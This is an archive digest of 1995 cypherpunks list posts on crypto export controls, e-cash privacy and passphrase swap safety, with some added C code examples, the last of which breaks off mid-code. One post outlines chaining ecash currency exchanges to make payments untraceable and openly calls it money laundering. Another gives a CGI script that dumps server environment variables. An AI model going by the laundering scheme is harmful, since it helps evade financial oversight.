   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 27 Oct 1995 21:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199510271325.GAA21232@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>>What other problems would benefit from easy access to lots of distributed
>>CPU cycles?
>
>3D Rendering and Physics simulations come immediately to mind.

A graphic-arts chum of mine is really hyper about cycle sales - it will
allow him to produce broadcast-quality commercials on a project-by-project
basis without a huge initial hardware upgrade investment. Is anyone working
on a Java library/demo/whatnot that allows plug-in algorithms, work
completion 'fetch next batch' code, and some rudimentary authentication
scheme? If not, I may tinker with this - if so, I'd like to chat :)
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 28 Oct 1995 01:27:54 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail, business and privicy
Message-ID: <acb653d50f021004a987@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 PM 10/27/95, WOOD@VAX2.ROCKHURST.EDU wrote:
>An old subject, but could someone please give me a pointer
>to the legalities of reading other people's mail in the working
>environment.
>
>Many thanks,

I doubt many others will offer answers to this one, so I will.

The usual way to get authorization to read the mail of other people is to
be officially deputized as a member of the Citizen's Morality Watch. Your
local law enforcement office, or the FBI, can help you fill out the
paperwork and get you the badge and ID card. (I signed up early, and have
one of the ID cards signed by William Webster.)

Once deputized, you are authorized to read whatever mail you may think a
threat to the public consciousness.

And when GAK arrives, you'll be duly authorized to gain access to escrowed
keys. And to escrowed house keys, escrowed car keys, and escrowed diaries.

This will finally give us the same measure of security that the Soviets had
when babushkas and KGB men read one's mail, and that the Iranians now have
with the Islamic Purity Patrols on the streets of Teheran.


--Klaus! von Future Prime, avatar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 27 Oct 1995 22:38:28 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: CJR returned to sender
In-Reply-To: <m0t8aTG-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


And yet people like MIT get approval for the release of PGP this way.

It is clear that 
1) the government will (verbally?) clear the "PGP procedure" when pushed.
2) they need to be pushed.

If anyone from MIT is reading this, it would be a real public service to 
put on a web site (a) what the system used for the release of PGP is 
exactly and (b) what assurances (oral, written, names & dates) were 
received from State/Commerce that this was legal.

Publicizing this information would lay the groundwork for APA (or, given
the way the ITAR is written, maybe no...) and 5th Amendment / due process
challenges by other parties unable to get the straight answers they
deserve. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 28 Oct 1995 01:13:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <KAA03062.199510271410@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <acb5766d09021004a512@[205.199.118.202]>, Timothy C. May writes:
[...ITAR preventing Netscape from distributing the non-40bit Netscape
effectively...]
>And I agree that this is a much more important issue than whether a t-shirt
>can get an OK for export or not.

I doubt anyone would disagree.

>If the CJR for the t-shirt is ultimately granted, what useful information
>will be derived,

The fuzzy line dividing exportable goods from non-exportable goods
will have gotten slightly clearer.  I admit it isn't all that novel
or interesting, or even in this case _useful_ result.  Esp since
the PGP book appears to be exportable.

However I think it is a good idea to slowly approach the dividing
line between exportable and non-exportable.  Wouldn't it be nice
to be able to hold up the shirt and say "this is exportable", and
then scan it & save it onto a floppy and then say "this is not"
(assuming that a floppy of the shirt is denied CJ) when arguing
with someone about how arbitrary the export laws are?

(Also we may find a better quality shirt printer and actually be
able to print readably not only CODE128 barcodes, but some of the
more advanced encoding methods that store as much as 40K a page...
how big is the PGP source?)

>                  or what implications for Netscape's question will be
>discovered?

Not much.

>If the CJR for the t-shirt is ultimately denied, ditto?

That would be much better.  More free publicity.  An example of how
impossible it is to enforce the ITAR that anyone should be able to
understand.


Of course in either case having the CJR steps posted *is* actually
valuable to anyone who hopes to take a shareware (or commercial, or
totally free) product through the same process (as opposed to 
anonymously posting it & not getting paid).


>Distribution over networks--which is happening every day, and which is
>happening every time the Cypherpunks list contains code fragments and other
>useful comments on crypto tools--is a much more serious issue.

Yes if distribution over the networks were allowed nobody would care
about the shirt.  Of course.

>The t-shirt joke is unlikely to help. (For all those who commented that
>wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
>the mosh pits, just lie to people about how the t-shirt "has been
>classified as a munition." It hasn't been as of this writing.)

I suspect the help the shirts will provide will be minimal.  They
may help cypherpunks & cyphergroupies spot each other on the street,
but that is of limited value.  They may help spread the word about
how foolish the ITAR is, and that is their only real value (well
aside from entertainment).

(and yeah it is a shame the shirt actually says "has been classified",
I had thought I said "qualifies as a" which would have been correct -
but that may just be my revisionist memory kicking in)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Sat, 28 Oct 1995 00:44:55 +0800
To: cypherpunks@toad.com
Subject: e-mail, business and privicy
Message-ID: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


An old subject, but could someone please give me a pointer 
to the legalities of reading other people's mail in the working 
environment.

Many thanks,	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 27 Oct 1995 22:39:12 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Mondex keeps records
In-Reply-To: <199510261340.AA15989@ideath.goldenbear.com>
Message-ID: <Pine.SUN.3.91.951027101018.10892J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


The snippet from network week (that hit my box via this list with no
subject line, not even a "blank", how do they do that?) suggests Mondex is
keeping transaction records.  When I put this exact question to the head
of Mondex last week, he said that the cards were capable of this, but that
they had not decided whether to do it or not.  The clear impression,
although in retrospect perhaps not the clear statement, was that they were
not doing it at the present time. 

Interesting.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 27 Oct 1995 18:39:17 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <8436.9510271027@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



On the T-shirt which some people are starting to view as an overplayed
joke:

I'd agree that we on cypherpunks have probably heard enough on the
subject, to the extent that it was creating a lot of noise a while
back, but the idea I think is to create publicity wherein ITAR is
ridiculed by demonstrating that the State Department's ITAR-related
decisions are inconsistent, and arbitrary.

This I think is a similar tactic to that used by Phil Karn, with the
Applied Crypto case, and by MIT with the MIT PGP source code book and
CJR on that.

Also the SSL 88+40 brute force was mostly a political demonstration,
most anyone could have predicted the approximate MIPs required, and
that it was ridiculously weak.  Yet much of the media attention widely
ignored the fact that it was a simple fact, 40 bits isn't enough, and
chose instead to play on wording such as "French Student Hacker breaks
Netscape", which of course is wildly inaccurate on numerous counts.

As to the accusation that a T-shirt is silly, sure, I absolutely
agree, but it's *supposed to be* silly, the point being to get a
decision from the state department, and say, look the decisions these
people are making with extreme weight of law ($1,000,000 fines &c) are
ridiculously inconsistent, and arbitrary, and cost the US software
industry 100s of millions of dollars each year in lost trade.  With a
silly example, I would have thought you would be more likely to get
positive editorials from the press.  I mean if you say PGP, some
people are sucked in by the crypto scare stories Freeh and co put out.
If it's a T-shirt you'd have a hard time saying it was a dangerous
item, or that the info was dangerous.

If unclear fabric printing is the issue, put it on a floppy disk
(would take less than one sector), print the program on the disk label
and try that too.  Also my uk printed shirts, and Don Henson's (other
US supplier) have a simply huge barcode (Joel's is around 1/2 the
size) the aim being to remove all doubt about readability.  See
pictures (mine (UK), and Don's (US) respectively):

	http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
	http://www.colossus.net/wepinsto/wsft_f/wspp_f/tshirt1.html

You could probably transcribe that barcode by hand the stripes are
that fat.  The ITAR docs themselves don't seem to make the case that
machine readability is significant, that was to my understanding just
an arbitrary decision they displayed with Phil Karn's Applied Crypto
disk set.  No to the disks due to being more machine readable than the
book, or something.  The reason for the barcode was to try to
encourage banning of the T-shirt by pandering to their apparent
predilection to ban machine readable forms of things freely available
in print form.

On the "has been declared a munition by State Department", this is
clearly incorrect.  Don Henson used this in his earlier ads, and I
corrected him on this wording, and he now says something different.

The wording on the shirt (Joel Furr's shirt which is what Raph mailed
I understand) the caption is:

	"This shirt is a munition"

and you can see a picture of this shirt here:

	http://www.danger.com/ad-perl.html

I don't think saying this shirt is a munition is that misleading.  It
is arguable, and of course no decision has been obtained from the
State Department, but if anyone is so sure about it I'd invite them to
make a public demonstration of exporting it in any medium they fancy
(paper, disk, internet, T-shirt).  Another candidate: export snuffle
without asking permission.  I hear that it is only 10 lines of C code.

Adam
--
Munitions T-shirt home page: http://www.obscura.com/~shirt/

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Fri, 27 Oct 1995 22:55:15 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Linux security issues
Message-ID: <30911745@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



>Actually keeping the pass phrase out of swap space is fairly easy (although
>I haven't looked at the PGP code to see if it actually does this).
>...
>However, the pass phrase is not the only dangerous information.
>...
>N.B. This problem affects all virtual memory operating systems.

Not all of them.  In at least one (VMS) you can pin pages in physical
memory, i.e., prevent them from being written to disk.  Actually, any OS
that does I/O directly to user pages has that capability in the kernel;
in the case of VMS (and possibly others, I don't know) it also exists as
a system service that applications can invoke.

This solves the problem: you can pin a suitable number of pages, and put
your sensitive data buffers there.

     paul
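
The two ideas from this thread combined, as an added example that is not part of either original message and not PGP's code: the pass phrase is read one character at a time with canonical mode and echo off, each character is folded into a running digest as it arrives, and the digest lives in a page pinned with POSIX mlock(), used here as the Unix counterpart of the VMS page-pinning service described above. The names keystate and absorb_passphrase are made up for this sketch, and FNV-1a stands in for a real key-derivation hash only to keep the block self-contained.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <termios.h>
#include <unistd.h>

/* Everything secret lives in this struct, which gets a page of its own. */
struct keystate {
    uint64_t h;        /* running digest of the pass phrase */
    unsigned char c;   /* the one character currently being absorbed */
    int locked;        /* 1 if mlock() succeeded, 0 if the page may be swapped */
};

static void wipe(void *p, size_t n) {
    volatile unsigned char *v = p;   /* volatile so the stores are not elided */
    while (n--) *v++ = 0;
}

/* Allocate one anonymous page for the key state and try to pin it in RAM. */
struct keystate *keystate_new(void) {
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, pg, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    struct keystate *ks = p;
    ks->locked = (mlock(p, pg) == 0);   /* can fail, e.g. RLIMIT_MEMLOCK */
    ks->h = 0xcbf29ce484222325ULL;      /* FNV-1a offset basis */
    ks->c = 0;
    return ks;
}

/* Zero the whole page before it is unpinned and returned to the OS. */
void keystate_free(struct keystate *ks) {
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    wipe(ks, pg);
    munlock(ks, pg);
    munmap(ks, pg);
}

/* Read fd one byte at a time up to end of line or EOF, folding each byte
   into ks->h. The phrase is never held as a whole line in user space.
   Returns the number of characters absorbed, or -1 on a terminal error. */
long absorb_passphrase(int fd, struct keystate *ks) {
    struct termios saved, raw;
    int is_tty = isatty(fd) && tcgetattr(fd, &saved) == 0;
    long n = 0;
    if (is_tty) {
        raw = saved;
        raw.c_lflag &= ~(tcflag_t)(ICANON | ECHO);  /* no line buffer, no echo */
        raw.c_cc[VMIN] = 1;
        raw.c_cc[VTIME] = 0;
        if (tcsetattr(fd, TCSAFLUSH, &raw) != 0) return -1;
    }
    while (read(fd, &ks->c, 1) == 1 && ks->c != '\n' && ks->c != '\r') {
        ks->h = (ks->h ^ ks->c) * 0x100000001b3ULL;  /* FNV-1a step */
        n++;
    }
    ks->c = 0;
    if (is_tty) tcsetattr(fd, TCSAFLUSH, &saved);    /* restore the terminal */
    return n;
}

int main(void) {
    struct keystate *ks = keystate_new();
    if (!ks) return 1;
    fprintf(stderr, "pass phrase: ");
    long n = absorb_passphrase(STDIN_FILENO, ks);
    fprintf(stderr, "\nabsorbed %ld characters, page %s\n",
            n, ks->locked ? "locked" : "NOT locked");
    keystate_free(ks);
    return n < 0;
}
```

The `locked` flag matters: when mlock() fails the code still runs, but the page can be paged out, so a caller handling real keys should treat that as an error.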




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 22:58:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <199510271429.KAA13494@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived,

Bar coded source code will be declared to be exportable under the
ITAR. This will be the first time machine readable crypto code is
declared exportable.

> If the CJR for the t-shirt is ultimately denied, ditto?

It will not only prove embarrassing because the situation is so silly,
and produce vast amounts of added P.R., but may very well prove to be
an ideal test case -- the speech in question is so political, and the
demonstrable harm to the national security so nonexistent, that the
court case would be of value.

Of course, Tim won't be seeing this posting (as he has declared me to
be on his kill list) so he'll keep claiming the exercise is useless,
but I think it's extremely valuable. Go for it! Don't let the grumpy
folk tell you this is a "joke". It's no more funny than the entire
export control regime.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 28 Oct 1995 01:18:33 +0800
To: Richard Johnson <Richard.Johnson@Colorado.EDU>
Subject: Re: HTTP Request-Header & Server Environment Echoes
In-Reply-To: <v02130500acb55ea73e82@[204.131.233.57]>
Message-ID: <Pine.SUN.3.90.951027102716.9465A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually this is too simple; just put the following in your cgi directory 
and make it executable:

#!/bin/sh

/bin/echo Content-type: text/plain
/bin/echo

set

That's all you need.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 26 Oct 1995, Richard Johnson wrote:

> Subject: HTTP Request-Header & Server Environment Echoes
> 
> <HTML>
> <HEAD>
>     <TITLE>What Your Browser Says Behind Your Back</TITLE>
> </HEAD>
> <BODY>
> <PRE><TT>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 28 Oct 1995 01:55:29 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Mark Twain Bank's DigiCash offer
Message-ID: <9510271546.AA00580@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>  As far as I can tell there is no charge for moving funds between
>  your ecash wallet and the "mint" at the bank.  The charges are for
>  moving between the "mint" and the world access account.  If you
>  had a shop which was able to pay much of its expenditures in ecash
>  it sounds like there would be no percentage fee to the bank.

The gotcha being that as long as your money is in the "mint" it is not under  
FDIC protection...  Just how safe your cash is when it is in the mint is  
entirely related to the security of Mark Twain's systems, which are  
high-profile machines that will surely be subjected to many cracking  
attempts.  Some may prefer to keep complete control over their cash and store  
all of it themselves.  Unlike physical cash, this stuff can be split up,  
encrypted, and stored in multiple places, possibly offering more security  
than the Mark Twain "mint."


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 23:47:33 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510271446.KAA13555@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> And yet people like MIT get approval for the release of PGP this way.
[...]

> If anyone from MIT is reading this, it would be a real public service to 
> put on a web site (a) what the system used for the release of PGP is 
> exactly and (b) what assurances (oral, written, names & dates) were 
> received from State/Commerce that this was legal.

I don't think they got any sort of approval from State or Commerce --
I think they just discussed it with their own lawyers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 28 Oct 1995 03:18:41 +0800
To: cypherpunks@toad.com
Subject: Children's Rooms at Libraries Need Regulation
Message-ID: <acb673171002100401b4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 PM 10/27/95, Jim Ray wrote:

>Humorous sidenote: PRZ said that the Exon <spit!> bill is the
>equivalent of turning the entire Internet into the children's room
>at the public library. I will be getting a videotape of the show in
>about 2 weeks, and if anyone wants me to make them a copy please
>e-mail me (privately!) and I will try to oblige.

Actually, the "children's rooms" at public libraries are next on the list
to be regulated. Many of the books our children are reading feature
_talking animals_ and other examples of animism and pagan beliefs. Some
even have witches and goblins. That our tax dollars are being used to fund
pagan and heathen views is cause for alarm.

Thankfully, out here in California we are shaking off our liberal, heathen,
godless Jew commie system. Los Altos, a prosperous community in Silicon
Valley, recently banned the mention of Halloween in its schools. No
costumes, no heathen imitations, and NO DEVIL WORSHIP!

Hallelujah!

"Freedom is not the freedom to have wrong beliefs."

--Klaus!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@TeleCheck.com>
Date: Sat, 28 Oct 1995 02:45:50 +0800
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: e-mail, business and privicy
In-Reply-To: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
Message-ID: <9510271741.AA04695@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text


> 
> An old subject, but could someone please give me a pointer 
> to the legalities of reading other people's mail in the working 
> environment.
> 
> Many thanks,	
> 

Unless otherwise notified, I believe you have a right to 
privacy.  Some companies are up front and make you sign a
piece of paper to the effect that when you're at work... 

Here at TeleCheck, we had to sign a piece of paper that promised
that we wouldn't read each *other's* mail, after a nasty incident
which involved an employee and forged mail ardently confessing
his newfound homosexuality (boy was he surprised...).  But that
was a long time ago, which predates the notices we had to sign.

The point was clear.  Don't read your supervisor's mail or you will be
terminated (as an employee was). 

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
			(800) 888-4922  *   (713) 439-6597
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 28 Oct 1995 01:59:29 +0800
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510271647.MAA07174@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510260424.OAA12383@sweeney.cs.monash.edu.au>,
jirib@sweeney.cs.monash.edu.au (Jiri Baum) wrote:


> What you'd really want is for Alice to pay for the new coins in ecash.

Right.

> I'm wondering whether a "coin-changer" would be easier or harder to
> set up than a "bank" (from regulatory point of view).

I don't think it would be any easier to set up. Harder perhaps, since its
sole purpose is money laundring. However, if there are several Ecash
currencies there is a legitimate need for Ecash currency arbitration. Who
is to stop the following protocol?

US Ecash -> Swedish Ecash
Swedish Ecash -> US Ecash

The resulting coins are no longer traceable unless the repayer cooperates.
The repayer (or in this case currency arbitrator) keeps of course a
percentage at each transaction. No different than a Casa de Cambio. It can
be set up anywhere and even be done anonymously. I am working on an
implementation.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJENOCoZzwIn1bdtAQETtQGA1c2lAxu2HcrudvQ7OgIrJptiDBueqVM5
uYIuB4n0fNzv6kdh+LYqctKj2BzOlE22
=a7mC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 28 Oct 1995 04:56:47 +0800
To: cypherpunks@toad.com
Subject: Electric Communities (was: COS_sec)
Message-ID: <v02120d04acb6f56280f0@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



FWIW, this is the company I work for. Not a bad article; more
info is available at: http://www.communities.com/. Three of
the nine people who work here are long-time subscribers to this
list... I was recruited at a c'punks Bay Area meeting.

--doug "member of the cryptographic staff" barnes

>      Electric Communities began work in 1993 on the
>      Cyberspace Operating System, or COS, designed to manage
>      the resources of shared computing -- like security and
>      bandwidth -- just as operating systems like the
>      Macintosh OS or Windows 95 manage resources inside a
>      desktop PC. The team is inventing some technology,
>      including a programming language (compatible with Sun
>      Microsystems' new Java language for Internet
>      applications) and a design concept for software building
>      blocks which it is in the process of patenting. In
>      addition, staff cryptographers are weaving encryption
>      throughout the system to make it absolutely secure and
>      private.
>
>
>   COS_sec  (6 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sat, 28 Oct 1995 02:13:31 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Linux security issues
In-Reply-To: <199510270552.WAA17904@netcom7.netcom.com>
Message-ID: <199510271704.NAA07834@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Actually keeping the pass phrase out of swap space is fairly easy (although
> I haven't looked at the PGP code to see if it actually does this).  Read the
> pass phrase in raw mode, one character at a time and convert it one
> character at a time to the decryption key for the private RSA key.  Then
> the OS doesn't need to buffer the whole line, either in kernel space or in
> user space.

This isn't as easy as you think, and it completely breaks many
abstractions to do this!  PGP does some of this, but not all of it.
It does get the passphrase one character at a time, however it does
buffer it all before hashing it to a key.  One reason is that you do
not necessarily know how big a session key you need, so you may need
to use different hashing techniques to get different sized keys.

It would be nice if PGP tried to lock its memory pages on OS's that
support page locking, so that some pages don't get swapped out.  But
that isn't a very general solution, since not all OS variants provide
such a mechanism.

-derek
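
One way to get the page locking this message wishes for, as an added example (not PGP's code and not part of the original post): the passphrase is read a byte at a time with echo and line assembly off, held only in an mlock()ed page, and wiped before release. PASS_MAX, the struct and all function names are assumptions of this example, and hashing the buffer to a key is left to the caller.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* exposes MAP_ANONYMOUS under strict -std= modes */
#endif
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>
#include <sys/mman.h>

#define PASS_MAX 128        /* assumed passphrase limit for this example */

struct secret_buf {
    unsigned char *data;    /* one private, page-aligned mapping */
    size_t cap, len;
    int locked;             /* 1 if mlock() succeeded */
};

/* Zero through a volatile pointer so the compiler cannot drop the wipe. */
static void wipe(void *p, size_t n) {
    volatile unsigned char *v = p;
    while (n--) *v++ = 0;
}

int secret_buf_init(struct secret_buf *b) {
    long page = sysconf(_SC_PAGESIZE);
    if (page < PASS_MAX) return -1;
    b->cap = (size_t)page;
    b->len = 0;
    b->data = mmap(NULL, b->cap, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (b->data == MAP_FAILED) { b->data = NULL; return -1; }
    /* Locking can be refused (unsupported OS, RLIMIT_MEMLOCK): record the
       outcome rather than failing, so the caller can warn the user. */
    b->locked = (mlock(b->data, b->cap) == 0);
    return 0;
}

void secret_buf_wipe(struct secret_buf *b) {
    wipe(b->data, b->cap);
    b->len = 0;
}

void secret_buf_free(struct secret_buf *b) {
    if (!b->data) return;
    secret_buf_wipe(b);                 /* wipe before the page is returned */
    if (b->locked) munlock(b->data, b->cap);
    munmap(b->data, b->cap);
    b->data = NULL;
}

/* Read up to a newline or EOF, one byte per read(). On a terminal, echo and
   canonical mode are switched off so the tty driver does not assemble a line.
   Returns the passphrase length, or -1 (buffer wiped) if it exceeds PASS_MAX. */
long read_passphrase(int fd, struct secret_buf *b) {
    struct termios saved, raw;
    int is_tty = isatty(fd) && tcgetattr(fd, &saved) == 0;
    unsigned char c = 0;
    long rc = 0;

    if (is_tty) {
        raw = saved;
        raw.c_lflag &= ~(tcflag_t)(ECHO | ICANON);
        raw.c_cc[VMIN] = 1;
        raw.c_cc[VTIME] = 0;
        tcsetattr(fd, TCSAFLUSH, &raw);
    }
    for (;;) {
        ssize_t n = read(fd, &c, 1);
        if (n < 0 && errno == EINTR) continue;
        if (n <= 0 || c == '\n' || c == '\r') break;
        if (b->len == PASS_MAX) { rc = -1; break; }
        b->data[b->len++] = c;
    }
    wipe(&c, 1);                        /* the only copy outside the locked page */
    if (is_tty) tcsetattr(fd, TCSAFLUSH, &saved);
    if (rc < 0) { secret_buf_wipe(b); return -1; }
    return (long)b->len;
}

/* Feed constructed input through a pipe so the path can be exercised offline. */
long demo_from_pipe(const char *typed) {
    int p[2];
    struct secret_buf b;
    ssize_t w;
    long n;
    if (pipe(p) != 0) return -2;
    if (secret_buf_init(&b) != 0) { close(p[0]); close(p[1]); return -2; }
    w = write(p[1], typed, strlen(typed));
    close(p[1]);
    n = (w < 0) ? -2 : read_passphrase(p[0], &b);
    /* a real caller hashes b.data[0..n) to the key here, before the wipe */
    secret_buf_free(&b);
    close(p[0]);
    return n;
}

int main(void) {
    struct secret_buf b;
    long n;
    if (secret_buf_init(&b) != 0) return 1;
    fputs("Passphrase: ", stderr);
    n = read_passphrase(STDIN_FILENO, &b);
    fprintf(stderr, "\nread %ld bytes, page %s\n", n, b.locked ? "locked" : "NOT locked");
    secret_buf_free(&b);
    return n < 0;
}
```

Locking keeps the page out of swap only; core dumps and hibernation images are separate paths that mlock() does not cover.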





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sat, 28 Oct 1995 02:19:53 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510271718.NAA07989@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> If anyone from MIT is reading this, it would be a real public service to 
> put on a web site (a) what the system used for the release of PGP is 
> exactly and (b) what assurances (oral, written, names & dates) was 
> received from State/Commerce that this was legal.

I can explain (and have explained in this forum) the technical aspect
of how the MIT PGP site works.  I was not involved in the law aspect
of the debate, so I cannot answer legal questions.

There is a two-tiered protection scheme.  The first scheme is that you
need to know the secret directory where PGP resides.  This directory
changes location every 30 minutes, so any attacker has a 30 minute
window in which a name will be valid.  Not 30 minutes from the time
they receive it, 30 minutes from the time the directory last changed
names.

The second scheme involves using reverse DNS lookups and comparing the
DNS hostname to a list of known US-valid hostnames/domains.

An attacker needs to be able to circumvent both schemes at once in
order to get to PGP.

I can go into more detail if people want, or I can take this offline
if people prefer.

-derek
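
The two checks described in this message, as an added example (not MIT's code and not part of the original post). It assumes rotation on fixed 30-minute boundaries, models the secret directory name by its slot number instead of deriving a name, uses a constructed allowlist and constructed hostnames, and adds forward confirmation of the PTR name, which the message does not mention.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <time.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define ROTATE_SECS (30 * 60)

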